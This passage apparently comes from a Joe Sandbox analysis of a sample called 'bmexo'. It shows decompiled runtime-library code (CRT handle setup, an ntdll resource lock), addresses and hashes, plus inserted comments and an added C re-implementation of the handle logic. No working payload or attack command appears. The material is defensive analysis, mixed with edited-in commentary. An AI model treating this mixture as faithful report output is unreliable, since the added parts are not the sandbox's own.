                                          								_t156 = 2;
                                          								_v32 = 1;
                                          								_v8 = _t156;
                                          								 *((short*)(_a12 + _v20 * 2)) = 0;
                                          								goto L34;
                                          							}
                                          						}
                                          						L8:
                                          						if(_v8 > 7) {
                                          							goto L41;
                                          						}
                                          						_t142 = _t141;
                                          						if(E009E06BA(_t123, _t141) == 0 || _t124 == 0) {
                                          							if(E009E06BA(_t124, _t142) == 0 || E009E0A5B(_t125, _t142) == 0 || _v24 > 0) {
                                          								goto L41;
                                          							} else {
                                          								_t128 = 1;
                                          								_a7 = 1;
                                          								_v28 = _t179;
                                          								_v16 = 1;
                                          								_v12 = 1;
                                          								L39:
                                          								if(_v16 == _t128) {
                                          									goto L20;
                                          								}
                                          								goto L28;
                                          							}
                                          						} else {
                                          							_a7 = 0;
                                          							_v28 = _t179;
                                          							_v16 = 1;
                                          							_v12 = 1;
                                          							goto L20;
                                          						}
                                          					}
                                          				}
                                          				L1:
                                          				_t123 = _t108 == 1;
                                          				if(_t108 == 1) {
                                          					goto L8;
                                          				}
                                          				_t128 = 1;
                                          				goto L39;
                                          			}

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: __fassign
                                          • String ID: .$:$:
                                          • API String ID: 3965848254-2308638275
                                          • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                          • Instruction ID: 58f9573f75302e6261b89caa9e68bcf2e6105aaa909f6d7929a76180cba6a043
                                          • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                          • Instruction Fuzzy Hash: F1A1BF71D0038ADBCF26CF56C8447BEB7B8BB95704F24896AD482A7281D7B49EC1CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 85%
                                          			E00F238A8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                          				signed int* _t82;
                                          				signed int _t86;
                                          				long _t90;
                                          				void* _t91;
                                          				intOrPtr _t94;
                                          				signed int _t98;
                                          				signed int _t99;
                                          				signed char _t103;
                                          				void** _t105;
                                          				void** _t106;
                                          				void** _t109;
                                          				signed char _t111;
                                          				long _t119;
                                          				void* _t129;
                                          				signed int* _t133;
                                          				void* _t135;
                                          				signed int* _t138;
                                          				void** _t139;
                                          				void* _t141;
                                          				signed int _t142;
                                          				signed int _t143;
                                          				void** _t147;
                                          				signed int _t149;
                                          				void* _t150;
                                          				void** _t154;
                                          				void* _t155;
                                          				void* _t156;
                                          
                                          				_push(0x64);
                                          				_push(0xf32260);
                                          				E00F22400(__ebx, __edi, __esi);
                                          				E00F2442F(0xb);
                                          				 *(_t155 - 4) = 0;
                                          				_push(0x40);
                                          				_t141 = 0x20;
                                          				_push(_t141);
                                          				_t82 = E00F24869();
                                          				_t133 = _t82;
                                          				 *(_t155 - 0x24) = _t133;
                                          				if(_t133 != 0) {
                                          					 *0xf34848 = _t82;
                                          					 *0xf350e4 = _t141;
                                          					while(_t133 <  &(_t82[0x200])) {
                                          						_t133[1] = 0xa00;
                                          						 *_t133 =  *_t133 | 0xffffffff;
                                          						_t133[2] = 0;
                                          						_t133[9] = _t133[9] & 0x00000080;
                                          						_t133[9] = _t133[9] & 0x0000007f;
                                          						_t133[9] = 0xa0a;
                                          						_t133[0xe] = 0;
                                          						_t133[0xd] = 0;
                                          						_t133 =  &(_t133[0x10]);
                                          						 *(_t155 - 0x24) = _t133;
                                          						_t82 =  *0xf34848; // 0x0
                                          					}
                                          					GetStartupInfoW(_t155 - 0x74);
                                          					if( *((short*)(_t155 - 0x42)) == 0) {
                                          						L27:
                                          						_t129 = 0xfffffffe;
                                          						L28:
                                          						_t142 = 0;
                                          						while(1) {
                                          							 *(_t155 - 0x2c) = _t142;
                                          							if(_t142 >= 3) {
                                          								break;
                                          							}
                                          							_t147 =  *0xf34848 + (_t142 << 6);
                                          							 *(_t155 - 0x24) = _t147;
                                          							if( *_t147 == 0xffffffff ||  *_t147 == _t129) {
                                          								_t147[1] = 0x81;
                                          								if(_t142 != 0) {
                                          									_t65 = _t142 - 1; // -1
                                          									asm("sbb eax, eax");
                                          									_t90 =  ~_t65 + 0xfffffff5;
                                          								} else {
                                          									_t90 = 0xfffffff6;
                                          								}
                                          								_t91 = GetStdHandle(_t90); // _t90 is -10/-11/-12 for fd 0..2: STD_INPUT_HANDLE, STD_OUTPUT_HANDLE, STD_ERROR_HANDLE
                                          								 *(_t155 - 0x1c) = _t91;
                                          								if(_t91 == 0xffffffff || _t91 == 0) {
                                          									L45:
                                          									_t147[1] = _t147[1] | 0x00000040;
                                          									 *_t147 = _t129;
                                          									_t94 =  *0xf36100;
                                          									if(_t94 != 0) {
                                          										 *( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10) = _t129;
                                          									}
                                          									goto L47;
                                          								} else {
                                          									_t98 = GetFileType(_t91);
                                          									if(_t98 == 0) {
                                          										goto L45;
                                          									}
                                          									 *_t147 =  *(_t155 - 0x1c);
                                          									_t99 = _t98 & 0x000000ff;
                                          									if(_t99 != 2) {
                                          										if(_t99 != 3) {
                                          											L44:
                                          											_t71 =  &(_t147[3]); // -15943740
                                          											E00F240A2(_t71, 0xfa0, 0);
                                          											_t156 = _t156 + 0xc;
                                          											_t147[2] = _t147[2] + 1;
                                          											goto L47;
                                          										}
                                          										_t103 = _t147[1] | 0x00000008;
                                          										L43:
                                          										_t147[1] = _t103;
                                          										goto L44;
                                          									}
                                          									_t103 = _t147[1] | 0x00000040;
                                          									goto L43;
                                          								}
                                          							} else {
                                          								_t147[1] = _t147[1] | 0x00000080;
                                          								L47:
                                          								_t142 = _t142 + 1;
                                          								continue;
                                          							}
                                          						}
                                          						 *(_t155 - 4) = _t129;
                                          						E00F23B53();
                                          						_t86 = 0;
                                          						L49:
                                          						return E00F22445(_t86);
                                          					}
                                          					_t105 =  *(_t155 - 0x40); // lpReserved2: the CRT handle-inheritance block from the parent
                                          					if(_t105 == 0) {
                                          						goto L27;
                                          					}
                                          					_t135 =  *_t105; // block layout: uint32 count, then count _osfile flag bytes, then count HANDLEs
                                          					 *(_t155 - 0x1c) = _t135;
                                          					_t106 =  &(_t105[1]); // flag bytes start at +4
                                          					 *(_t155 - 0x28) = _t106;
                                          					 *(_t155 - 0x20) = _t106 + _t135; // handle array starts right after the flag bytes, unaligned
                                          					if(_t135 >= 0x800) { // at most 0x800 (2048) inherited fds are honoured
                                          						_t135 = 0x800;
                                          						 *(_t155 - 0x1c) = 0x800;
                                          					}
                                          					_t149 = 1;
                                          					 *(_t155 - 0x30) = 1;
                                          					while( *0xf350e4 < _t135) {
                                          						_t138 = E00F24869(_t141, 0x40);
                                          						 *(_t155 - 0x24) = _t138;
                                          						if(_t138 != 0) {
                                          							0xf34848[_t149] = _t138;
                                          							 *0xf350e4 =  *0xf350e4 + _t141;
                                          							while(_t138 <  &(0xf34848[_t149][0x200])) {
                                          								_t138[1] = 0xa00;
                                          								 *_t138 =  *_t138 | 0xffffffff;
                                          								_t138[2] = 0;
                                          								_t138[9] = _t138[9] & 0x00000080;
                                          								_t138[9] = 0xa0a;
                                          								_t138[0xe] = 0;
                                          								_t138[0xd] = 0;
                                          								_t138 =  &(_t138[0x10]);
                                          								 *(_t155 - 0x24) = _t138;
                                          							}
                                          							_t149 = _t149 + 1;
                                          							 *(_t155 - 0x30) = _t149;
                                          							_t135 =  *(_t155 - 0x1c);
                                          							continue;
                                          						}
                                          						_t135 =  *0xf350e4;
                                          						 *(_t155 - 0x1c) = _t135;
                                          						break;
                                          					}
                                          					_t143 = 0;
                                          					 *(_t155 - 0x2c) = 0;
                                          					_t129 = 0xfffffffe;
                                          					_t109 =  *(_t155 - 0x28);
                                          					_t139 =  *(_t155 - 0x20);
                                          					while(_t143 < _t135) {
                                          						_t150 =  *_t139;
                                          						if(_t150 == 0xffffffff || _t150 == _t129) {
                                          							L22:
                                          							_t143 = _t143 + 1;
                                          							 *(_t155 - 0x2c) = _t143;
                                          							_t109 =  &(( *(_t155 - 0x28))[0]);
                                          							 *(_t155 - 0x28) = _t109;
                                          							_t139 =  &(_t139[1]);
                                          							 *(_t155 - 0x20) = _t139;
                                          							continue;
                                          						} else {
                                          							_t111 =  *_t109;
                                          							if((_t111 & 0x00000001) == 0) {
                                          								goto L22;
                                          							}
                                          							if((_t111 & 0x00000008) != 0) {
                                          								L20:
                                          								_t154 = 0xf34848[_t143 >> 5] + ((_t143 & 0x0000001f) << 6);
                                          								 *(_t155 - 0x24) = _t154;
                                          								 *_t154 =  *_t139;
                                          								_t154[1] =  *( *(_t155 - 0x28));
                                          								_t37 =  &(_t154[3]); // 0xd
                                          								E00F240A2(_t37, 0xfa0, 0);
                                          								_t156 = _t156 + 0xc;
                                          								_t154[2] = _t154[2] + 1;
                                          								_t139 =  *(_t155 - 0x20);
                                          								L21:
                                          								_t135 =  *(_t155 - 0x1c);
                                          								goto L22;
                                          							}
                                          							_t119 = GetFileType(_t150);
                                          							_t139 =  *(_t155 - 0x20);
                                          							if(_t119 == 0) {
                                          								goto L21;
                                          							}
                                          							goto L20;
                                          						}
                                          					}
                                          					goto L28;
                                          				}
                                          				_t86 = E00F22600(_t155, 0xf33400, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
                                          				goto L49;
                                          			}
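The two loops above are the handle-table setup of the MSVC CRT (`_ioinit`): the first walks the block the parent passed in STARTUPINFO.lpReserved2 (a count, that many _osfile flag bytes, then that many HANDLEs, clamped to 0x800) and keeps an entry only if it is not INVALID_HANDLE_VALUE or -2, has FOPEN set, and is either a pipe or accepted by GetFileType; the second attaches the process standard handles to fds 0..2 that are still free. What follows is an added example, not code from the report or from the sample, that re-implements both passes with the same flag bits, sentinels and order of checks so they can be read in one place. GetFileType and GetStdHandle are replaced by stub callbacks, the input block is constructed by hand, and handles are 32-bit as in this x86 sample; all three are assumptions made so the code runs without Windows.

```c
/* Added example (not from the Joe Sandbox report or the sample): the two
 * handle-table passes of the decompiled routine above (MSVC CRT _ioinit).
 * Flag bits, sentinels and the lpReserved2 layout are the CRT's; GetFileType
 * and GetStdHandle are stub callbacks and the input block is constructed. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#define CRT_FOPEN 0x01u   /* _osfile: slot in use            (sample: _t111 & 1) */
#define CRT_FPIPE 0x08u   /* _osfile: pipe, skip GetFileType (sample: _t111 & 8) */
#define CRT_FDEV  0x40u   /* _osfile: character device       (sample: |= 0x40)   */
#define CRT_FTEXT 0x80u   /* _osfile: text mode              (sample: |= 0x80)   */
#define CRT_MAX_INHERITED 0x800u      /* clamp in the sample: "_t135 >= 0x800"  */
#define INVALID_HANDLE    0xFFFFFFFFu /* INVALID_HANDLE_VALUE, 32-bit as on x86 */
#define NO_CONSOLE_FILENO 0xFFFFFFFEu /* CRT's (intptr_t)-2 sentinel (_t129)    */
typedef struct { uint32_t handle; uint8_t osfile; } crt_fh;
typedef unsigned (*file_type_fn)(uint32_t h);   /* stands in for GetFileType  */
typedef uint32_t (*std_handle_fn)(int which);   /* stands in for GetStdHandle */

/* Pass 1: STARTUPINFO.lpReserved2 = [uint32 count][count flag bytes][count
 * HANDLEs, unaligned].  Returns the number of fds adopted, -1 if truncated. */
int crt_walk_inherited_handles(const uint8_t *blob, size_t cb, file_type_fn file_type,
                               crt_fh *table, size_t nslots)
{
    uint32_t count;
    if (cb < sizeof count) return -1;
    memcpy(&count, blob, sizeof count);
    if (count > CRT_MAX_INHERITED) count = CRT_MAX_INHERITED;
    size_t flags_off = sizeof count, handles_off = flags_off + count;
    if (cb < handles_off + (size_t)count * sizeof(uint32_t)) return -1;
    int adopted = 0;
    for (uint32_t i = 0; i < count && i < nslots; i++) {
        uint8_t osfile = blob[flags_off + i];
        uint32_t h;
        memcpy(&h, blob + handles_off + (size_t)i * sizeof h, sizeof h);
        if (h == INVALID_HANDLE || h == NO_CONSOLE_FILENO) continue;
        if (!(osfile & CRT_FOPEN)) continue;
        if (!(osfile & CRT_FPIPE) && file_type(h) == 0) continue; /* FILE_TYPE_UNKNOWN */
        table[i] = (crt_fh){ h, osfile };
        adopted++;
    }
    return adopted;
}

/* Pass 2: fds 0..2 still free get GetStdHandle(-10 - fd); inherited ones only
 * gain FTEXT.  Returns how many standard handles were attached. */
int crt_fill_std_handles(crt_fh *table, std_handle_fn get_std, file_type_fn file_type)
{
    int attached = 0;
    for (int fd = 0; fd < 3; fd++) {
        if (table[fd].handle != INVALID_HANDLE && table[fd].handle != NO_CONSOLE_FILENO) {
            table[fd].osfile |= CRT_FTEXT; continue;           /* sample: |= 0x80 */
        }
        table[fd].osfile = CRT_FOPEN | CRT_FTEXT;              /* 0x81 in the sample */
        uint32_t h = get_std(-10 - fd);                         /* STD_INPUT/OUTPUT/ERROR_HANDLE */
        unsigned type = (h == INVALID_HANDLE || h == 0) ? 0 : file_type(h);
        if (type == 0) {                                        /* sample label L45 */
            table[fd].handle = NO_CONSOLE_FILENO; table[fd].osfile |= CRT_FDEV; continue;
        }
        table[fd].handle = h;
        if (type == 2) table[fd].osfile |= CRT_FDEV;            /* FILE_TYPE_CHAR */
        else if (type == 3) table[fd].osfile |= CRT_FPIPE;      /* FILE_TYPE_PIPE */
        attached++;
    }
    return attached;
}

/* Constructed input: fd0 open char device, fd1 not open, fd2 pipe,
 * fd3 INVALID_HANDLE_VALUE, fd4 open but GetFileType fails (stale handle). */
static unsigned stub_file_type(uint32_t h) { return h == 0x10 ? 2 : h == 0x20 ? 3 : h == 0x1C ? 0 : 1; }
static uint32_t stub_get_std(int which) { return which == -11 ? 0x20 : INVALID_HANDLE; }
size_t example_block(uint8_t *buf, size_t cap)
{
    static const uint8_t  flags[5]   = { 0x01, 0x00, 0x09, 0x01, 0x01 };
    static const uint32_t handles[5] = { 0x10, 0x14, 0x18, INVALID_HANDLE, 0x1C };
    uint32_t count = 5;
    if (cap < sizeof count + sizeof flags + sizeof handles) return 0;
    memcpy(buf, &count, sizeof count);
    memcpy(buf + sizeof count, flags, sizeof flags);
    memcpy(buf + sizeof count + sizeof flags, handles, sizeof handles);
    return sizeof count + sizeof flags + sizeof handles;        /* 29 bytes */
}

/* Runs both passes on the constructed block; returns the fds adopted from it. */
int example_run(crt_fh *table, size_t nslots, int *std_attached)
{
    uint8_t buf[64];
    size_t cb = example_block(buf, sizeof buf);
    for (size_t i = 0; i < nslots; i++) table[i] = (crt_fh){ INVALID_HANDLE, 0 };
    int adopted = crt_walk_inherited_handles(buf, cb, stub_file_type, table, nslots);
    *std_attached = crt_fill_std_handles(table, stub_get_std, stub_file_type);
    return adopted;
}

int main(void)
{
    crt_fh table[8]; int std_n;
    int n = example_run(table, 8, &std_n);
    printf("adopted %d inherited fds, attached %d standard handles\n", n, std_n);
    return 0;
}
```

On the constructed block only fds 0 and 2 survive the first pass (fd 1 lacks FOPEN, fd 3 is INVALID_HANDLE_VALUE, fd 4 fails the GetFileType stub), so the second pass attaches a standard handle only to fd 1. A block shorter than its own count is rejected as truncated rather than read past its end, which is the check worth keeping in mind when the parent that built the block is not trusted.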
                                          0x00f238a8
                                          0x00f238aa
                                          0x00f238af
                                          0x00f238b6
                                          0x00f238be
                                          0x00f238c1
                                          0x00f238c5
                                          0x00f238c6
                                          0x00f238c7
                                          0x00f238ce
                                          0x00f238d0
                                          0x00f238d5
                                          0x00f238f2
                                          0x00f238f7
                                          0x00f238fd
                                          0x00f23906
                                          0x00f2390c
                                          0x00f2390f
                                          0x00f23912
                                          0x00f2391b
                                          0x00f2391e
                                          0x00f23924
                                          0x00f23927
                                          0x00f2392a
                                          0x00f2392d
                                          0x00f23930
                                          0x00f23930
                                          0x00f2393b
                                          0x00f23946
                                          0x00f23a7b
                                          0x00f23a7d
                                          0x00f23a7e
                                          0x00f23a7e
                                          0x00f23a80
                                          0x00f23a80
                                          0x00f23a86
                                          0x00000000
                                          0x00000000
                                          0x00f23a91
                                          0x00f23a97
                                          0x00f23a9d
                                          0x00f23ab1
                                          0x00f23ab7
                                          0x00f23abe
                                          0x00f23ac3
                                          0x00f23ac5
                                          0x00f23ab9
                                          0x00f23abb
                                          0x00f23abb
                                          0x00f23ac9
                                          0x00f23acf
                                          0x00f23ad5
                                          0x00f23b23
                                          0x00f23b29
                                          0x00f23b2c
                                          0x00f23b2e
                                          0x00f23b35
                                          0x00f23b3a
                                          0x00f23b3a
                                          0x00000000
                                          0x00f23adb
                                          0x00f23adc
                                          0x00f23ae4
                                          0x00000000
                                          0x00000000
                                          0x00f23ae9
                                          0x00f23aeb
                                          0x00f23af3
                                          0x00f23b00
                                          0x00f23b0b
                                          0x00f23b12
                                          0x00f23b16
                                          0x00f23b1b
                                          0x00f23b1e
                                          0x00000000
                                          0x00f23b1e
                                          0x00f23b06
                                          0x00f23b08
                                          0x00f23b08
                                          0x00000000
                                          0x00f23b08
                                          0x00f23af9
                                          0x00000000
                                          0x00f23af9
                                          0x00f23aa3
                                          0x00f23aa9
                                          0x00f23b3d
                                          0x00f23b3d
                                          0x00000000
                                          0x00f23b3d
                                          0x00f23a9d
                                          0x00f23b43
                                          0x00f23b46
                                          0x00f23b4b
                                          0x00f23b4d
                                          0x00f23b52
                                          0x00f23b52
                                          0x00f2394c
                                          0x00f23951
                                          0x00000000
                                          0x00000000
                                          0x00f23957
                                          0x00f23959
                                          0x00f2395c
                                          0x00f2395f
                                          0x00f23964
                                          0x00f2396e
                                          0x00f23970
                                          0x00f23972
                                          0x00f23972
                                          0x00f23977
                                          0x00f23978
                                          0x00f2397b
                                          0x00f2398d
                                          0x00f2398f
                                          0x00f23994
                                          0x00f23a2e
                                          0x00f23a35
                                          0x00f23a3b
                                          0x00f23a4b
                                          0x00f23a51
                                          0x00f23a54
                                          0x00f23a57
                                          0x00f23a5b
                                          0x00f23a61
                                          0x00f23a64
                                          0x00f23a67
                                          0x00f23a6a
                                          0x00f23a6a
                                          0x00f23a6f
                                          0x00f23a70
                                          0x00f23a73
                                          0x00000000
                                          0x00f23a73
                                          0x00f2399a
                                          0x00f239a0
                                          0x00000000
                                          0x00f239a0
                                          0x00f239a3
                                          0x00f239a5
                                          0x00f239aa
                                          0x00f239ab
                                          0x00f239ae
                                          0x00f239b1
                                          0x00f239b9
                                          0x00f239be
                                          0x00f23a1b
                                          0x00f23a1b
                                          0x00f23a1c
                                          0x00f23a22
                                          0x00f23a23
                                          0x00f23a26
                                          0x00f23a29
                                          0x00000000
                                          0x00f239c4
                                          0x00f239c4
                                          0x00f239c8
                                          0x00000000
                                          0x00000000
                                          0x00f239cc
                                          0x00f239dc
                                          0x00f239e9
                                          0x00f239f0
                                          0x00f239f5
                                          0x00f239fc
                                          0x00f23a06
                                          0x00f23a0a
                                          0x00f23a0f
                                          0x00f23a12
                                          0x00f23a15
                                          0x00f23a18
                                          0x00f23a18
                                          0x00000000
                                          0x00f23a18
                                          0x00f239cf
                                          0x00f239d5
                                          0x00f239da
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00f239da
                                          0x00f239be
                                          0x00000000
                                          0x00f239b1
                                          0x00f238ea
                                          0x00000000

                                          APIs
                                          • __lock.LIBCMT ref: 00F238B6
                                            • Part of subcall function 00F2442F: __mtinitlocknum.LIBCMT ref: 00F24441
                                            • Part of subcall function 00F2442F: EnterCriticalSection.KERNEL32(00000000,?,00F237AB,0000000D), ref: 00F2445A
                                          • __calloc_crt.LIBCMT ref: 00F238C7
                                            • Part of subcall function 00F24869: __calloc_impl.LIBCMT ref: 00F24878
                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 00F238E2
                                          • GetStartupInfoW.KERNEL32(?,00F32260,00000064,00F21654,00F32190,00000014), ref: 00F2393B
                                          • __calloc_crt.LIBCMT ref: 00F23986
                                          • GetFileType.KERNEL32 ref: 00F239CF
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1052302354.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
                                          • Associated: 00000006.00000002.1052293820.0000000000F20000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000006.00000002.1052319704.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000006.00000002.1052334096.0000000000F33000.00000008.00000001.01000000.00000005.sdmp
                                          • Associated: 00000006.00000002.1052343640.0000000000F37000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__calloc_impl__lock__mtinitlocknum
                                          • String ID:
                                          • API String ID: 2772871689-0
                                          • Opcode ID: f9df9586100333055fbc5648f6e36e04d5aa3fcaae10efe38433ebe85814fd2c
                                          • Instruction ID: dd4e4a338abbaec1797c91964a1c9e8e708664458bfbc02cccb88bade7aa4ab6
                                          • Opcode Fuzzy Hash: f9df9586100333055fbc5648f6e36e04d5aa3fcaae10efe38433ebe85814fd2c
                                          • Instruction Fuzzy Hash: 4881E5B1D052658FCB14CF68E8416A9BBF0AF45320B24426ED4A6AB3D1C73CE943EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 50%
                                          			E009E0554(signed int _a4, char _a8) { // ntdll RtlAcquireResourceShared(Resource, Wait); the "RTL: Acquire Shared Sem Timeout" strings below identify it
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int* _t49;
                                          				signed int _t51;
                                          				signed int _t56;
                                          				signed int _t58;
                                          				signed int _t61;
                                          				signed int _t63;
                                          				void* _t66;
                                          				intOrPtr _t67;
                                          				void* _t69;
                                          				signed int _t70;
                                          				void* _t75;
                                          				signed int _t81;
                                          				signed int _t84;
                                          				void* _t86;
                                          				signed int _t93;
                                          				signed int _t96;
                                          				intOrPtr _t105;
                                          				signed int _t107;
                                          				void* _t110;
                                          				signed int _t115;
                                          				signed int* _t119;
                                          				void* _t125;
                                          				void* _t126;
                                          				signed int _t128;
                                          				signed int _t130;
                                          				signed int _t138;
                                          				signed int _t144;
                                          				void* _t158;
                                          				void* _t159;
                                          				void* _t160;
                                          
                                          				_t96 = _a4; // RTL_RESOURCE: +0x28 NumberOfActive (negative while held exclusively), +0x2c ExclusiveOwnerThread
                                          				_t115 =  *(_t96 + 0x28);
                                          				_push(_t138);
                                          				if(_t115 < 0) {
                                          					_t105 =  *[fs:0x18]; // TEB; +0x24 is ClientId.UniqueThread
                                          					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                          					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) { // held exclusively by another thread: go wait; the owner re-enters without blocking
                                          						goto L6;
                                          					} else {
                                          						__eflags = _t115 | 0xffffffff;
                                          						asm("lock xadd [eax], edx");
                                          						return 1;
                                          					}
                                          				} else {
                                          					L6:
                                          					_push(_t128);
                                          					while(1) {
                                          						L7:
                                          						__eflags = _t115;
                                          						if(_t115 >= 0) {
                                          							break;
                                          						}
                                          						__eflags = _a8;
                                          						if(_a8 == 0) {
                                          							__eflags = 0;
                                          							return 0;
                                          						} else {
                                          							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                          							_t49 = _t96 + 0x1c;
                                          							_t106 = 1;
                                          							asm("lock xadd [edx], ecx");
                                          							_t115 =  *(_t96 + 0x28);
                                          							__eflags = _t115;
                                          							if(_t115 < 0) {
                                          								L23:
                                          								_t130 = 0;
                                          								__eflags = 0;
                                          								while(1) {
                                          									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                          									asm("sbb esi, esi");
                                          									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00a801c0;
                                          									_push(_t144);
                                          									_push(0);
                                          									_t51 = E0099F8CC( *((intOrPtr*)(_t96 + 0x18))); // wait on SharedSemaphore (+0x18)
                                          									__eflags = _t51 - 0x102;
                                          									if(_t51 != 0x102) { // 0x102 = STATUS_TIMEOUT: log, re-wait and count; anything else ends the loop
                                          										break;
                                          									}
                                          									_t106 =  *(_t144 + 4);
                                          									_t126 =  *_t144;
                                          									_t86 = L009E4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                          									_push(_t126);
                                          									_push(_t86);
                                          									L009F3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                          									L009F3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                          									_t130 = _t130 + 1;
                                          									_t160 = _t158 + 0x28;
                                          									__eflags = _t130 - 2;
                                          									if(__eflags > 0) {
                                          										E00A2217A(_t106, __eflags, _t96);
                                          									}
                                          									_push("RTL: Re-Waiting\n");
                                          									_push(0);
                                          									_push(0x65);
                                          									L009F3F92();
                                          									_t158 = _t160 + 0xc;
                                          								}
                                          								__eflags = _t51;
                                          								if(__eflags < 0) {
                                          									_push(_t51);
                                          									E009E3915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                          					asm("int3"); // unreachable after the raise above; from here down the decompiler has run on into the adjacent exclusive-acquire routine ("RTL: Acquire Exclusive Sem Timeout", +0x20 ExclusiveSemaphore, +0x24 NumberOfWaitingExclusive)
                                          									while(1) {
                                          										L32:
                                          										__eflags = _a8;
                                          										if(_a8 == 0) {
                                          											break;
                                          										}
                                          										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                          										_t119 = _t96 + 0x24;
                                          										_t107 = 1;
                                          										asm("lock xadd [eax], ecx");
                                          										_t56 =  *(_t96 + 0x28);
                                          										_a4 = _t56;
                                          										__eflags = _t56;
                                          										if(_t56 != 0) {
                                          											L40:
                                          											_t128 = 0;
                                          											__eflags = 0;
                                          											while(1) {
                                          												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                          												asm("sbb esi, esi");
                                          												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00a801c0;
                                          												_push(_t138);
                                          												_push(0);
                                          												_t58 = E0099F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                          												__eflags = _t58 - 0x102;
                                          												if(_t58 != 0x102) {
                                          													break;
                                          												}
                                          												_t107 =  *(_t138 + 4);
                                          												_t125 =  *_t138;
                                          												_t75 = L009E4FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                          												_push(_t125);
                                          												_push(_t75);
                                          												L009F3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                          												L009F3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                          												_t128 = _t128 + 1;
                                          												_t159 = _t158 + 0x28;
                                          												__eflags = _t128 - 2;
                                          												if(__eflags > 0) {
                                          													E00A2217A(_t107, __eflags, _t96);
                                          												}
                                          												_push("RTL: Re-Waiting\n");
                                          												_push(0);
                                          												_push(0x65);
                                          												L009F3F92();
                                          												_t158 = _t159 + 0xc;
                                          											}
                                          											__eflags = _t58;
                                          											if(__eflags < 0) {
                                          												_push(_t58);
                                          												E009E3915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                          												asm("int3");
                                          												_t61 =  *_t107;
                                          												 *_t107 = 0;
                                          												__eflags = _t61;
                                          												if(_t61 == 0) {
                                          													L1:
                                          													_t63 = E009C5384(_t138 + 0x24);
                                          													if(_t63 != 0) {
                                          														goto L52;
                                          													} else {
                                          														goto L2;
                                          													}
                                          												} else {
                                          													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                          													_push( &_a4);
                                          													_push(_t61);
                                          													_t70 = E0099F970( *((intOrPtr*)(_t138 + 0x18)));
                                          													__eflags = _t70;
                                          													if(__eflags >= 0) {
                                          														goto L1;
                                          													} else {
                                          														_push(_t70);
                                          														E009E3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                          														L52:
                                          														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                          														_push( &_a4);
                                          														_push(1);
                                          														_t63 = E0099F970( *((intOrPtr*)(_t138 + 0x20)));
                                          														__eflags = _t63;
                                          														if(__eflags >= 0) {
                                          															L2:
                                          															return _t63;
                                          														} else {
                                          															_push(_t63);
                                          															E009E3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                          															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                          															_push( &_a4);
                                          															_push(1);
                                          															_t63 = E0099F970( *((intOrPtr*)(_t138 + 0x20)));
                                          															__eflags = _t63;
                                          															if(__eflags >= 0) {
                                          																goto L2;
                                          															} else {
                                          																_push(_t63);
                                          																_t66 = E009E3915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                          																asm("int3");
